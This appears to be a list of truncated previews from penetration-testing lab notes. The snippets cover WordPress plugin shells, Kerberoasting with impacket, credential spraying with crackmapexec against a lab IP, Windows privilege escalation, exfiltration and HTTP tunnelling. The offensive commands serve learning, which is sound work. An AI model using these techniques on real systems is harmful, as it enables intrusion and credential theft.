Obtaining a Shell: to obtain a shell, we must first package the plugin in a way that WordPress knows how to handle. WordPress expects plugins to be in a zip file. When WordPress receives the zip fi...
Extracting SPNs from Kali: the -k parameter is used for Kerberos authentication (NTLM is used by default): # Example 1 (with Kerberos) impacket-GetUserSPNs scrm.local/ksimpson:ksimpson -k -dc-ip dc1.s...
This article assumes that you have already obtained a low-privilege shell on your victim’s computer. You have enumerated this machine and concluded that the operating system is Windows XP with SP0 ...
Basic Compilation gcc -o exploit exploit.c 32-Bit Compilation gcc -m32 -Wl,--hash-style=both -o exploit exploit.c
WinPEAS: on Windows, one automated script is WinPEAS. Windows-Privesc-Check: another automated script is windows-privesc-check, which can be found in the windows-privesc-check We’ll specify the self...
In certain scenarios, we may need to exfiltrate data from a target network using a Windows client. This can be complex since standard TFTP, FTP, and HTTP servers are rarely enabled on Windows by de...
SMB crackmapexec smb 10.10.11.158 -u users -p creds Example: [[StreamIO#^11d8df]] LDAP crackmapexec ldap 10.10.11.158 -u users -p creds --continue-on-success [[StreamIO#^676765]] WINRM crackmap...
During the enumeration and information gathering process, we discover a MySQL service running on TCP port 3306. C:\Windows\system32>netstat -anpb TCP netstat -anpb TCP Active Connections P...
For this to work, the Windows system must have the IP Helper service running and IPv6 support must be enabled for the interface we want to use. Fortunately, both are on and enabled by default on Wi...
Our goal is to initiate a remote desktop connection from our Kali Linux machine to the Windows Server 2016 through the compromised Linux server using only the HTTP protocol. We will rely on HTTPTu...